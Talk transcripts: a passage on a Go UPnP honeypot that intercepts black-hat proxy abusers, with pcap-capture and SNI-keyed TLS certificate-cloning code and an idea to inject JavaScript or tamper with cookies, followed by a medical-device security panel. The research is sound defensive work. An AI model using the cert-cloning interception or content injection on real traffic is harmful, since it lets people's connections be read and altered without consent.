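    f, err := os.Create(fmt.Sprintf("session-%d.pcap", time.Now().Unix()))
    if err != nil {
        log.Fatal(err)
    }
    defer f.Close()
    w := pcapgo.NewWriter(f)
    if err := w.WriteFileHeader(65535, layers.LinkTypeEthernet); err != nil {
        log.Fatal(err)
    }

    src := gopacket.NewPacketSource(handle, handle.LinkType())
    for pkt := range src.Packets() {
        if err := w.WritePacket(pkt.Metadata().CaptureInfo, pkt.Data()); err != nil {
            log.Fatal(err)
        }
    }
}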
The first thing is that they don't blindly inject their their proxies. They actually come and do some testing. So injections they first come and they insert a test proxy instance. A test proxy instance. Once they confirm that it works then they inject a real proxy. They utilize it and then they attempt to delete it. I say attempt well we'll cover that. So this is the process of an injection. We see them show up with their msearch banner. We respond with our ssdp response here and you see that we point them to 192.168.01 on port 2048 and then etsylinuxigdgatedesk.xml. We see them come back within the same second and they then request that. You can see ssdpn and upnpn there. They request that and from there they think that we are the device they're looking for. Once they have confirmed that then they come back and they attempt to add their port mapping. So in this case they're adding an entry that will force us to listen to on port 22280. It's a tcp socket and any traffic received on that is going to be redirected to port 80 on the host at 74.6231.21. You can see down there the new port mapping description kind of mirrors the external port that they use that's sync and then a number and then the new lease duration is 600 seconds. So this will time out after 600 seconds. Then they come back and they utilize that newly injected proxy. So here you can see they sync 2280. Everything up there between the curly braces is the proxy configuration. We can see the source. We can see where ultimately they're going to point to. So 93191 3976 on port 57388 is going to send traffic to 74 6231 21 on port 80. Ultimately we intercept a get request to YAHU with no headers so it's super easy to spot and YAHU because they move to HTTPS ultimately issues a 301 permanently moved and this is all they really need for their fingerprint. Once that's done we see the attacker come back and they attempt to delete the port mapping but they send us malformed XML. What's interesting here is that the malformed XML apparently has I don't know if they forgot a null at the end of the envelope but it continues as a buffer over read and what we ultimately see here is XML that is not related to this request but it just happened to neighbor it in memory. What's interesting here in this case it's the same injection they just sent us. What isn't that interesting? What's more interesting and there are other instances where there is XML information leakage from the buffer over read from other devices that they may have been talking to recently. In this case at some point they were talking to a D-Link DSL 2730U. If you check that out you can see that it is a popular item on a popular e-commerce website. It's actually a choice item on that e-commerce website and it has 3100 readings. For 1,329 rupees you can buy this device and that's about $19 US I believe and you can inadvertently be a Black Hat Proxy too. These are some of the top talkers or sorry some of the top injected test endpoints. You can see there's Akamai Yahoo a few others in there. That top one is clearly the standout winner the 893910512 and they're going to ip.shtml. That's a special page. It returns your public-facing IP address which here I've clearly modified it and then this UBCIEG plug that they use for some kind of identification I'm assuming. There's also a very large campaign being run against Google. This is predominantly all the TLS traffic. It's very weird. I don't know what it is. 
Out of the 59,924 intercepted requests going across the TLS sockets all of them 100% targeted Google. This is click fraud SEO. I don't know what it is. This is an example of a caught request. They're searching for a Cisco spark board factory reset. We can see their accept language. We can see their cookies. The user agent they used all that good stuff. We can see even they seem to be coming from Dallas based on the information linkage in the URL but I can't really confirm that. I can't really confirm that. Also here we see the response. We get a 200 okay for their search. We see the cookies. It's not here but we would actually have the full page content and everything. It's disabled in this case because that was a lot of log lines. I mean gigs and gigs and gigs at Google pages. In total they sent 57,237 search terms. There are no really clear patterns. They're from all different geos that they target. They use a ton of different user agents. And each request gets basically one search per session. So you can see that top result there has only shown up 55 times out of 57,000 requests. It's just a search for the word Samsung in quotes which is weird. Some of the funnier searches that were captured 72-hour deodorant, antivirus download now, Marlboro summer camp, leather trousers outfit, fa fa fa fa slot hack. I don't even know what that is. I should probably Google some of these to see but I haven't yet. And like I said they're very geographically distributing their stuff across the Google platform. There are domains in here that I don't even know what country they affiliated with. So did you know there's a dot bj.as.jm.md.ee. They're clearly targeting Google.com the most followed by co.uk but still there's so many that they're hitting it's crazy. This is the user agent profiles. So they sent 293 different user agents. And then you can see there's almost normalized clusters of user agent distribution across the abuse. And these are some of the top talkers. So it's not what you'd expect, right? You would, I guess, I mean, I guess kind of it is what you'd expect if it's a single abuser. But the the nature of the queries almost make it seem organic. It doesn't seem like it has an abuse pattern. It almost seems like real end users. But then it's not real end users showing up and popping holes in this stuff. They're all being ferried through a handful of top talkers. And then you have your outliers. If we look at the top 10, we see that Worldstream, Worldstream, Worldstream, Worldstream, OVH, Worldstream, OVH, Worldstream, OVH and Avast. So let me just put it this way. If you work at Worldstream, find me at the bar. If you work at OVH, find me at the bar. If you work at Avast, find me at the bar and I'll buy your drink if you tell me what the hell is going on there. Because I don't know why Avast would be showing up in this data set, but there they are. So some theories on this. The queries to me seem too oddly human. They're in a bunch of different languages. They're stuff like, you know, the best car insurance in Dallas, Fort Worth area. Okay. So it's too organic to be just purely automated abuse, in my opinion. And I'm not sure that the people that are using these proxies are aware that they're using them. I have this theory that it may be some kind of residential proxy reseller or some kind of, you know, ultimate anonymous VPN service provider or something. And these people think that they're getting like these super secret, you know, high privacy stuff. 
You'll also intercept some other stuff outside of TLS. Here, for example, are some spam messages that were being routed. These guys were injecting Outlook servers, and then, you know, you can watch the entire interaction. You can watch as they send their HELO, you can see as they confirm different addresses are deliverable, and then they build their message and shoot it across. You get to see all of that. The good news here is that Spamhaus is doing God's work and stopping a lot of that abuse from actually succeeding. This was just a fun finding from the older data set. So while this project was going on, Belarus had a very tumultuous political event where a bunch of people went out and protested the recent election, and as a result, Belarus shut down their internet access to news and political websites. And while that was going on, suddenly I started seeing these guys popping up in the UPnProxy honeypot. The top site was sb.by, which is a news website, and it looks like they were trying to get to the registration page and then solve some captchas. The other was photo.belta.by, which is a stock imaging host, I think, or something. But they were actually doing, not command injections, SQL injections, which I found pretty funny. And then the third one here is mail.rec.gov.by. According to Google Translate, this is the Central Commission of the Republic of Belarus on Elections, or something along those lines. And they were just trying to check their mail, it looks like. And then on the bottom one here, we've got a news outlet, ont.by, and they're trying to get to what appears to be its Exchange server. So I just found that kind of interesting. All right. So that's a lot of history and a lot of observations, but now comes the cool part. I'm open sourcing all of this. So anybody that wants to take this, stick it on the internet, play with it, modify it, whatever you want to do, have at it, it's yours. And this way we can all kind of share the fun and see what's going on with these campaigns. And if you find really cool stuff, I'd love to hear about it. So with that open source announcement, let's get some stuff out of the way. First things first, this project was for fun, it's for research, and it was for me to practice my Golang during COVID. Second, I apologize for my shitty code. I know it's shitty. I've learned more Golang since then and learned more design patterns in Golang since then, and I really understand how shitty my code is. I'm sorry. Like I said, it was a research project. It's not commercial-grade software. It served its purpose and it did well enough to serve that purpose, and that's all I really needed out of it. Yes, there are bugs. Thank you for noticing. If you open an issue, there's a great chance I'm not going to address it. Maybe someone else in the community will, but this is not my top priority anymore. So I would encourage you to learn some Golang and maybe submit a pull request instead if you'd like to fix that bug. Yes, it's hacky. I know. I am a hacky developer. I'm not your enterprise-leading, scrum-running, everything-else developer. So it is what it is. If you have ideas to fix or improve stuff, it's open source. Have at it, boss. Fork away, send pull requests, whatever. I'll likely accept a pull request. I will likely ignore the issue that you submit on GitHub. So some ideas for improvements.
If you want to hit the ground running, logging could be improved. Content injection could be a thing: in a world where people are abusing this stuff, I imagine that you could stick JavaScript in pages, or you could tamper with cookies, or you could inject plugs of text that might be indexable, that you could maybe turn up on a search engine later. I don't know. These are just some ideas I've had. There is a memory leak. I know. The run script actually restarts the binary every hour to get around this, because I haven't had time to actually troubleshoot it. Yes, it runs in screen. I regret nothing. Feel free to properly daemonize it if you'd like. This, I think, would be the biggest benefit: if you randomize the SSDP banners and listen on multiple popular exposed UPnP ports, I have a feeling you're going to see a much more diverse set of attackers show up. My findings may be myopic because I'm pretending to be a single device, and that single device is what's being targeted by these people. If you were to diversify the target that you paint for your attacker, it's possible you will also diversify your findings. Some additional ideas for improvement. The cert caching: when I wrote this, the cert caching was not taking SNI differences into account. It works on Google because all Google servers are just Google. If you were to, say, have an injection that pointed to some place that had multiple domains associated with it, your one cloned cert is only going to be the one that is aligned with that initial request. You could improve that by actually keying the cert cache on the SNI value, the domain name that was used when that cert was cloned. Improved TLS handling: like I said, it was working, it has stopped working, and improving that would probably fix the problem. Improved cert cloning: clone more fields to better emulate the remote endpoint cert that you're trying to clone. Improved error handling, because I didn't really handle any errors, so anything is an improvement. Improved basically everything else. You can find most of the information you'll need in the readme file. If there is anything I missed, please feel free to submit a pull request with the updates you found when deploying the stuff. It's written in Golang, but it does have Linux dependencies. It will run on any operating system, so long as it's Linux. You can deploy a node on a VPS very easily. You could also run it on Raspberry Pis or ODROIDs or anything else. Stick it in the DMZ and it will be good to go. Typically, you start to see abuse within the first 24 to 48 hours of deployment. It may be even lower than that. The last thing: if you find something cool, please hit me up on LinkedIn and let me know about it. I'd love to hear if you find new and interesting trends in some of your deployments. That wraps it up. Go grab the project, pull it down, hack it up, compile it, deploy it. Let me know what you find. Go have fun.
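On the SNI-aware cert caching improvement mentioned above, here is a rough Go sketch of one way to do it: key the cache of cloned certificates on the SNI value the client presents, and clone on first sight of a new name. This is my own illustration of the suggested fix, not code from the project; cloneUpstreamCert is a hypothetical stand-in for the honeypot's real cert-cloning routine.

```go
package main

import (
	"crypto/tls"
	"fmt"
	"sync"
)

// Cache of cloned certificates, keyed by the SNI value the abuser's client
// sends, so an injection that fronts multiple domains gets the right clone.
var (
	mu    sync.RWMutex
	certs = map[string]*tls.Certificate{}
)

// cloneUpstreamCert is a placeholder: a real implementation would dial the
// genuine endpoint, copy fields from its leaf certificate, and self-sign a
// lookalike. Returning an empty certificate here is only to keep the sketch
// compilable.
func cloneUpstreamCert(sni string) (*tls.Certificate, error) {
	return &tls.Certificate{}, nil
}

// getCertificate is plugged into tls.Config.GetCertificate; it returns a
// cached clone for the requested SNI or clones one on first sight.
func getCertificate(hello *tls.ClientHelloInfo) (*tls.Certificate, error) {
	sni := hello.ServerName
	mu.RLock()
	crt, ok := certs[sni]
	mu.RUnlock()
	if ok {
		return crt, nil
	}
	crt, err := cloneUpstreamCert(sni)
	if err != nil {
		return nil, err
	}
	mu.Lock()
	certs[sni] = crt
	mu.Unlock()
	return crt, nil
}

func main() {
	cfg := &tls.Config{GetCertificate: getCertificate}
	fmt.Println("TLS config ready; cert cache keyed by SNI:", cfg != nil)
}
```

crypto/tls invokes GetCertificate once per handshake with the client's requested name in hello.ServerName, so a single injection that fronts multiple domains ends up with a matching clone for each name instead of reusing whichever cert happened to be cloned first.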
|
UPnP sucks, everybody knows it, especially blackhat proxy operators. UPnProxyPot was developed to MITM these operators to see what they're doing with their IoT proxy networks and campaigns. We'll cover SSDP, UPnP, UPnProxy research/campaigns as well as cover a new Golang based honeypot, so we can all snoop on them together! REFERENCES: http://www.upnp-hacks.org (OG disclosure) https://www.youtube.com/watch?v=FU6qX0-GHRU (DEF CON 19 talk I attended) https://www.akamai.com/us/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf (my initial UPnProxy research) https://blogs.akamai.com/sitr/2018/11/upnproxy-eternalsilence.html (additional UPnProxy campaign researcher, also mine)
|
10.5446/54197 (DOI)
|
It's a little too quiet out there. Can we please raise up the volume a little bit out there? This is Defcon! Y'all acting like there's a pandemic out there or something? All right, we're going to kick off this early evening party panel talk here about the most happy topic on the planet, which is what the dumpster fire is going on with healthcare, right? But before we begin with that, I just wanted to say we all really appreciate you coming out here. I'm going to introduce myself quickly, then Replicant at the end is going to talk a little bit. We'll get to introducing the rest of our panel, which is who you truly came here for. Please give it up in the middle here. And then we're going to get to some topics. We'll talk a little bit about the format. Cool. All right. My name is Kowati. Welcome to the Do No Harm panel. We're going to talk a little bit as an introduction about this because this is not the first time we've done this. And perhaps of all the other times we've had this panel this year may be the most important. And so what the hell are we talking about up here? And that's the fact that we're all going to die. And somewhere between now and when you die, you're going to probably interact with a hospital. You're going to talk with doctors and nurses. You're going to have medicines and whatnot. And believe it or not, it ends up that healthcare nowadays is pretty damn connected. And it's all running vulnerable shit. And for the most part, it's been a raging dumpster fire for us as long as I've been around pretty much. That is what this is about. If you're interested about learning of other stuff, there's another really awesome talk going on. But we would encourage you here. And then also we'll have some opportunity to answer questions. Jeff, go ahead and take it. Sure. So for those who may not have come to one of these before, this is actually the fifth year that we've been doing this. And I just want to give a quick shout out because this entire idea started as a conversation between inebriated people in the hotel room of a one Mr. Beau Woods, who's sitting here in the middle with us. And those of us who are adjacent to or exploring this space were like, hey, it's all we're all here at DEF CON. Let's actually sit down and see if we can figure some of the stuff out ourselves. So that has morphed into something that we have been honored and privileged to be able to do at DEF CON now for the last couple of years. And what we really wanted to try to do with each and every iteration, but especially now is give you guys the chance to have conversations with people who are superstars in the fields that we're talking about here, ask your questions, figure out how you can get involved and really face to face with some pretty incredible people. So what we're going to do is we're going to have a little bit of a conversation between us, probably aim for about 45 to 60 minutes on that. And then we'd like to open it up for general questions from the audience. But then at some point we're all just going to kind of split off and move to different parts of the room. We would love to pick your brains, hear from you, and sort of talk about some of these issues in a little bit more personal space. Before we introduce our panel, the last thing that I do want to say is that we had two folks that are affiliated with the federal government who were unable to make it here in person because of travel restrictions. 
Anybody really interested in hearing from two incredible people should check out our recorded talk, but it's basically Josh Corman from CISA and Jessica Wilkerson from the FDA. And so we wish they were here. I think we're going to hear from Josh a little bit later, but that's the one caveat. Starting down with Quadi, give a little bit more information about who you are, what you're up to, and then we'll go through our panel and introduce ourselves. Hey, I'm Quadi. I am actually an ER doc, so if you meet me at work you're having the worst day of your life. I hope not to meet you in the emergency department, but maybe somewhere else like at a bar. And when I'm not doing work in the emergency department, I do cybersecurity research on medical devices, healthcare impacts of cyber attacks, basically ransomware. How does ransomware harm patients? And then again, sorry, right before we get to Beau who's the next one, we wanted to also say a giant shout out to DEF CON. Fifth year this has been here. We really appreciate this. You guys being out here, got a hell of a thing to put together. Thank you, DEF CON, for all of us at Dino Harms. Go ahead and introduce yourself, Beau. Hi, my name is Beau Woods. I do a lot of different things. I actually started my career in healthcare. I worked at a hospital for about three years in IT and in Infosec. And one of the, I don't know, interesting characteristics that I found is like a lot of healthcare networks are a little bit like archaeology. You find all kinds of things that you thought were dead living in hospitals on the networks where they probably really shouldn't be. More recently, I've been a part of an initiative called I am the Cavalry, which is a global grassroots initiative. A bunch of hackers got together and said, you know, our dependence on connected technology is growing faster than our ability to secure it in areas impacting human life, public safety. And no matter how high and deep we got into federal government and industry, we found that the Cavalry wasn't coming. We realized we were the adults in the room and that scared the hell out of you as it should scare anyone to have some dude with a random blue mohawk who is, you know, the adult in the room. But we have managed to turn that into some really good impact, including, you know, I worked at the FDA for a year on building a new pathway to market for software as a medical device. So like the app on your watch that tells you if you're having atrial fibrillation. Also drafted up something called the Hippocratic oath for connected medical devices, which we may talk a little bit about in a bit. And this led me to do a lot more with healthcare and industry, including starting the device lab at the biohacking village, which if you haven't gone and checked that out yet this year, you really should. It's a ton of fun and they're doing some really good things over there. So I could probably talk all night, but I won't. All right. My name is Gabrielle. I started kind of like Bo my career in science and healthcare. Started out doing pharmaceutical and medical device regulation. Moved into cybersecurity kind of through all of that. And now I currently work as a cloud security engineer in healthcare and also do medical device research and genetic science consulting on the side. Hi, everyone. I'm Stephanie and I started out in the office of security research space focused predominantly on embedded systems. 
And then about seven years ago, I decided there was this really big need in the healthcare space for security savvy people to kind of come in and help, right, elevate the maturity. And so I spent the last seven years as a consultant in the security for medical device space. So I've worked with medical device manufacturers on just about every stage of securing medical devices. Also with hospitals and healthcare delivery organizations on how do they manage the risk of the medical devices that they have and then even regulators to help them understand what should they be looking at from a cybersecurity perspective before they clear a device for sale, both here in the United States and abroad. And my name is replicant. I am an immature computer hacker and a professional central nervous system hacker. So as an anesthesiologist, I doster brain while people poke you with sharp objects. And I work with Quadi on the academic side of things to take a look at medical device security, infrastructure security and how that's a patient safety outcomes-based issue. So let's just give a big round of applause for everybody other than me. What a great panel. This is usually a little bit more of an intimate affair in a much smaller room. So it's really cool to see everybody out here. At the risk of perhaps boring some people who are very familiar with this concept, I wanted to take the liberty of asking some of our panelists to sort of give a very general 30,000-foot view sketch of some of the topics we're talking about just in case you wandered in here because there's nothing else to do and you are hearing about this type of security for the first time. So Stephanie, we're going to ask you to give a little bit of an overview of what's been going on with medical devices and then Bo to talk a little bit about the infrastructure and policy issues. Yeah, so I'll actually take just 10 seconds to explain everyone just what actually is a medical device. So it's a term that gets thrown around a lot, but it actually has a legal meaning. And so I'm not going to get too boring, but just understand that anything in a healthcare space that helps treat or diagnose a medical condition is considered a medical device. So something like a tongue depressor, that big popsicle stick that they put in your mouth, that is actually a medical device. And so it ranges from the non-digital all the way through the digital that you're probably thinking of with things like pacemakers and insulin pumps. And so understanding all of those are regulated as medical devices, but the potential for patient harm that that device can cause against a patient is what dictates basically what severity of a medical device it is or what class it is. So not all medical devices are treated equally. A class three medical device like a pacemaker is held to a much higher bar from a regulatory perspective. And so understand when we talk about cybersecurity for medical devices, that bar, it's all risk management based game, right? There's no compliance, there's no certification in medical device cybersecurity. It's all risk management based. It is you putting together the story as a manufacturer of here's what I did for cybersecurity, here's how I perceived the risk in my medical device, and then taking that to a regulator and saying, here, I think I've controlled enough of the risks in this device that you should let me sell it here in this country. And so this journey really started back in 2014. 
So the first regulatory guidance around cybersecurity for medical devices came out from the FDA in 2014, and it was around what we call pre-market cybersecurity. So all the things you needed to do for cybersecurity as a medical device manufacturer to get your device ready to sell. The post-market cybersecurity guidance came out a few years after that, and then that overviewed everything you needed to do after that medical device was approved for sale here in the United States, then what you needed to do for that. The FDA has gone back and they're working on a revision for that pre-market guidance, but it's currently out in draft form. So if you want to see sort of where is the FDA going with the requirements that they're now putting in medical devices, you can read the current draft version of the pre-market guidance that's out. And the FDA has been a really, they've been awesome in this space. They have absolutely been partnering with the security research community, the medical device manufacturers, and they're trying to really grow cybersecurity medical devices without stifling innovation. It's a really, really tough balancing act to make sure that we continue to raise that bar in cybersecurity, but you can't stop innovation in medical devices. And so that delicate balance, and sorry, I won't pontificate forever. No, that was awesome. And then of course, we've just had a smattering in the last like 15 years of vulnerable medical devices that caught some attention, right? So we had the pacemaker, AICDs, devices implanted inside your body that can shock your heart when your heart rhythm starts getting strange, right? Those have been vulnerable and demonstrated to be potentially deadly if attacked. Infusion pumps that control the rate of medication going into patients, those are also been shown to be vulnerable like in 2015. And insulin pumps, I mean, there's a whole host of devices. And it seems like the common thread was a researcher wanted to learn more about it. They bought a device off of eBay or got it somewhere else. And in a short time, they found that something really potentially concerning about patient safety. Awesome. So we're going to go now. It's not just about medical devices. We're going to talk today also about like hospital infrastructure. One of the concepts we're going to talk about is, you know, how can vulnerability, if exploited, impact a person's life, right? Their ability to be diagnosed with a particular disease or get the treatment that they need. And all that stuff that supports that care is all that infrastructure. And so Bo's going to talk a little bit about just an introduction to healthcare infrastructure and its vulnerabilities as well. I'm curious. I know every time we do this, after we step down from the podium and go out into the crowd, always there's like five or six people who come up to me like, man, I work in a hospital. That was so cool. You're talking about the things that I live and breathe every day. So just by show of hands, if you want to raise your hand, who works in or has worked in a hospital dealing with tech stuff? Okay. That's a good number. How many have had loved ones in the hospital or have been in a context in a setting where you were impacted by ransomware or some other type of security incident at a hospital? Raise your hand. Okay. A few people. One of my first days working security at a hospital, we had a network worm that went around and it hit a bunch of servers. Didn't think too much of it. 
We were able to pop in with a remote desktop or whatever, push some policies out to get rid of it. It wasn't too big of a deal for too long. Probably took us half a day to clean up, which is not terrible. The next day I went in and I got a call from a physician in the natal intensive care unit. The natal intensive care unit, if you don't know, it's where some of the most vulnerable patients in a hospital are. It's premature babies. The patients who they struggle just to take their first breath. They're a little bit behind the curve to start with. The physician who called me up was like, hey, our fetal heart monitors are going up and down and every time they go offline and come back on, they have this windows screen. And it's happening about every 15 minutes or so. I wonder, you know, I know you're not the medical device person, but can you help us out with this? I said, hey, sure, I'll give it a shot. So I knew that we had the network worm the day before, windows screen. So I started going through a quick diagnostic. And it turns out that these fetal heart monitors, which are systems that basically track the premature babies' biorhythms so that the nurses can sit and watch it so that it can feed into the medical care that the doctors give, they were infected with this banking trojan that was meant to steal grandma's, you know, bank password. But instead, it was causing in these devices a reboot every 15 minutes. And so it would lose patient state. And what happens in that case is you have to have a lot more patient care delivered manually by doctors and nurses who are really competent, but it takes a toll. So you need extra doctors and nurses coming in. The consistency will dip if it's not automated because humans are more fallible than computer programs. And so basically these vulnerable patients were at a loss. So called up the manufacturer, the manufacturer said, oh, you know, sorry, that sounds like a malicious software issue. We don't cover that. Said, okay, well, give me the password. I can get into it. I know how to get rid of this. It's not a problem. They're like, oh, we can't give you the password. It's a medical device. You can change something. Like, wait a minute. So there's a virus. There's unwanted known malicious code on this. And I want to put known productive code, you know, the patch that the manufacturer issued and the software manufacturer for the operating system. And you won't let me do that because that's a change, but malicious software is not a big enough change for you to, you know, have a problem with it. They're like, well, you know, that's whatever. They used a line which is a lie that it's a medical device and therefore we can't change it without getting reauthorized by the FDA. Totally not true. And we can talk about that more probably in some of the after chat. So I reasoned that if this device got hit by a piece of malware, a network worm, the vulnerability exists. I can exploit that vulnerability too. So I drafted a justification, went up to hospital leadership, got all the necessary approvals. They thought it through and started just using Metasploit to pop the boxes, drop the patch, kill the malware and get the doctors back to save in lives. Yeah, Metasploit. Hacking for good, right? I mean, we want to use our hacking skills for something good and this was a really productive use. I was able to put the doctors back in charge of patient care rather than being dominated by malicious actors who ended up being in, I think, Morocco and Turkey at the time. 
So that was like my first introduction to security and my first introduction to healthcare security and it's gotten a lot better since then, fortunately. But that's the type of consequences that you have in healthcare that you don't have in a lot of other industries, right? So worked a lot in banking and retail and other places. A bank system gets hacked and probably not too many people are going to die from that. A hospital system goes down and the consequences are much different. They're materially different. Not just in degree but in kind. In addition to that, you know, you have medical record systems which, you know, we probably have all been to a hospital or at least a doctor's office and had our patient records go into this computing system which allows doctors to track us. It allows us to do a lot more positive things with population health so that we can find causes of diseases so that we can track people through their medical records and be able to treat them if they go from, you know, Dr. A in Sacramento to Dr. B in New York City. So there's a lot of benefits but yet these electronic health systems in some cases were prematurely connected. We incentivized putting these health records in a computerized system but we didn't necessarily incentivize to the same degree securing those systems. In Heimzeit a lot of us in this room look back at it as a mistake and yet there's also scientifically rigorous data that shows that that has helped population health improve. In my more recent life in doing cyber policy and I feel like I can say cyber in this crowd because I live inside the Beltway. I live in DC and I work in talking to policymakers so I promise I will drink later for saying that. But in thinking about some of these issues, oh man I lost my thread, talking about the cybers and drinking. Too much drinking already? Too much drinking already possibly. Well, you know, I am compliant with the 321 rule. I got 4 hours of sleep each of the last 5 or 6 nights so I am ready to go. Although I missed my second meal yesterday and I need to get a second meal today otherwise I'm going to be all out of compliance. But in my role as cyber policy person I've talked to a lot of people in high positions of power and one of those was former president of European nation and after having some of these conversations where before the conversation was all about data confidentiality we started talking about health records. And so the very shorthand version that he came up with was I don't care as much if somebody can read my blood type. I care if they can change it in the system. That would cause a much bigger impact. And while we've spent over the past 5 years about a trillion dollars globally on people product services, most of that has been focused on data confidentiality. And the capabilities that you use for data confidentiality are very different than the ones that you would use to protect the integrity and availability of human life. So I think hospitals and other places where you deliver healthcare are really interesting places where we may not have the hands-on experience to deal with those types of infrastructure in the same way that they need to be handled. So less of a data-focused aspect and more of an impact of physical conditions. And so the infrastructure in hospitals is very different than what we may think of. And so when we apply some of our general rules we might have to think differently a little bit to make sure that we don't inadvertently cause harm to human life. 
Christian, you've got a great line. I may butcher it, but it's something like as we seek to treat existing pathologies we should be careful not to inadvertently create new ones. That sounds much smarter than I actually am. Yeah, he read that on a fortune. Yeah, so I'll take that one. All right. So yeah, so I want to ask the panel a question and I want to start with Gabb first. But basically like we have these types of conversations every year and one of the most interesting things is what is the change in our thinking from your tier? And obviously we are 18 months now into a global pandemic which is a sentence I would say in med school. But yeah, like you have a very unique and interesting role as part of our response. So what have you learned in the past 12 to 18 months that has really sort of changed your preconceived notions about what we need to be thinking about when we talk about the security in healthcare? I think we've seen a really big stress on our health system and we've seen a lot of hospitals at or beyond their capacity and it's made people realize that yes, we need to figure out what's going on, what we can do to kind of keep this from happening again. And I think we've also seen situations where that max capacity that the hospitals did reach was exploited in some ways. If a hospital is at max capacity and suddenly they are hit by ransomware and malware taken down, that's a huge problem. That's so many patients that have issues. And I know there's been quite a few breaches in the last year. It seems like healthcare breaches have been in the news a lot more than maybe previous years because of the fact that COVID has everything in the spotlight. But I mean, there have been times that the cardiac cath lab went down. They couldn't use any of the materials, machines that they needed to in those labs or use the ICU as intended. And it's just become a lot more of a visible issue, I think. Yeah. And so I'll add on to that. One of the things in working with hospitals at the beginning of the pandemic or before it happened, there was this really growing maturity in how are we handling medical device cybersecurity. There was these really amazing plans about we're going to do micro segmentation, it's going to be amazing, we're going to put all these medical devices. And as soon as the pandemic started, all just crumpled out of throat in the garbage, we're pulling old medical devices out of closets, we're pulling them out of old academic institutes, we're setting up clinics in parking lots. And for good reasons, right? But I mean, that just all those network rules, all the segmentation, just gone, right? So you ended up with this really big spaghetti monster of networking of medical devices now inside of hospitals because they just had to get stuff to work quickly. And on the regulatory side, there was actually relaxing of regulatory requirements for medical device manufacturers to put out updates to medical devices that enabled remote patient care. So a medical device that previously a clinician had to walk into the room and do something to, if a manufacturer was able to put out a software update that removed the need for the clinician to walk into that room and instead maybe task it from a nurse's station, there was actually relaxing of the regulatory rigor needed for the manufacturer to put out that update because they wanted those things to come out quickly. So I support that they did that, but understanding that that also happened as a result. 
So some of the software updates that were coming out at the time to enable remote care to some of these medical devices did not go through the normal rigor process. And in some cases they did, right? Some manufacturers still did their normal business as usual, but some would have taken that route that was relaxed rigor on what was actually needed from a testing verification perspective of those patches. So you're just now starting to, in the healthcare space, I feel like you're just now starting to see these IT clinicians come out and up and able to breathe and actually say, okay, I need to clean out the spaghetti monster that I made. And so you're now starting to see that bandwidth come back where they're looking back at, okay, how do I re-segment these networks? How do I get these legacy medical devices in a secure network versus just the, like, let's just put it all together and make it work. So I think we're starting to see now that wave of let's kind of clean up that technical debt that we acquired early on in the pandemic. And so we're starting to clean that up. I just want to get anyone in the audience to raise your hand. If you saw a doctor or a nurse practitioner or some other provider on your phone or on your laptop during this pandemic, raise your hand. All right, keep your hand up if you thought that was rad. All right, keep your hand up if you think that that person was behind, like them connecting to the network and viewing your medical record or using the telehealth platform that they did could, you know, hold itself up to like the lowest of skid. Oh, there's like no one up there. Exactly. To continue what Stephanie said was that, like, I'm an ER doc. When the pandemic hit, I put my hacker brain to the side and I thought, like, we're going to be, I remember my, I remember my boss saying, pack a bag. You may, that has to be, you have to live with two weeks of stuff. You may not see your family. You might have to live at the hospital. We don't know how bad this pandemic is going to get. And so my hacker brain was like, all this work that we had done to try to secure these devices and all the fear that I had about this had to go on the side and COVID took the front. And we were, that exactly was the paradigm we had, which was, you know, how can I treat patients at home when they have the only thing I have is a phone for them to call me with. And so it was an explosion of access, almost no regard for commensurate security. And I don't think that, I think that was the right call, right? We were worried about bodies in the streets at that point. I mean, luckily, we, you know, not at least here in the United States, we saw that very often. But I think what it showed to us also was that it is so fragile. It is amazing what actually supports healthcare and how fragile a technology that we are so dependent on is in use all the way around the world. And if it took this awful pandemic for the people paying attention to realize that, you know, it's a virus now, but our dependence and the potential for consequence to human life could very easily be replicated with a pretty large attack, a pretty large ransomware attack, for example. Bo, I want to ask you as somebody more on the policy side, I definitely echo what Quaddy was saying. Like when we were in the thick of it, we were intubating patients in the ICU and running the one ventilators, you know, we were looking for a machine that could deliver positive pressure to a patient with disease lungs. And that's the bare minimum. 
There were so many inventive solutions, partly from the makers and the hacker space who were able to jerry rig things. Has your thinking at all changed with respect to the threat model? Because we had all this exposure to medical devices and the security wasn't really as much of an issue as we are now seeing with more infrastructure-based attacks. I mean, for the last five years we've been worried about a discreet, individualized medical device. And now we're starting to appreciate the problem differently. Can you talk about your thoughts on that? Yeah. That's a complex question. I'll give a slightly off topic answer, because something that Christian said really triggered me to think about the positive outcomes that we could see. And especially in public policy, some of the positive outcomes. So for those people who raised your hands because you could see a doctor on your phone or on your laptop, that only happened because of a policy change where telehealth, telemedicine is now reimbursable by insurance. I think that's absolutely amazing. Like why have we not had the ability for home health care? Why have we had to go into a doctor's office? Yeah, thank you. Why have we had to go into a doctor's office, take time out of a day or whatever? Why can't we just get on these phones? The technology in the vaccines that most of us have now taken, everybody in this room has been vaccinated. Not everybody has been vaccinated with the same technology. But like mRNA vaccines are absolutely astounding in what the capabilities are. And it kind of took a pandemic for us to unleash some of these things that we've been hypothesizing about for a while and trying to do. I remember I had a conversation with a physiotherapist who, you know, physiotherapy is like very hands-on. You have to touch people, move their arms down and manipulate their body so that their body can recover in a way that helps them get by. And they were doing remote physiotherapy sessions and the person's partner was actually the one who was doing the physical touch. Like think about what that means in terms of a patient. Instead of having a stranger touch you or be there with you, it's your loved one, whether it's a family member, a friend or whatever. I would like to, well, I want to focus on the happy side of it and the fortunate side of it for a minute because a lot of times we just look at the downsides. But I think there's a lot of amazing capabilities that can come out of it. And Jeff, to your question, you know, how does my threat model change? I'm seeing and trying to see, it takes conscious effort because we're wired differently than a lot of other people. I want to see the benefits, the silver linings and look at what can come out of this that we could then use to create the next generation of patient care and the next generation of more convenient, more effective medicine and health that we can deliver to people around the world. Okay, we're going to ride that amazing uplifting sentiment to the top of the roller coaster and we're going to go right back down, okay? And I think that is, we'll start off by saying, you know, the vaccine was amazing and we have an expert on this panel to discuss that. But I mean, Gab, how close were we to like one ransomware attack to having six months delaying the vaccine? Like that is terrifying shit. Think about how many people would die. And I'm kind of curious because you have some insight. Yeah, definitely. It was bad. 
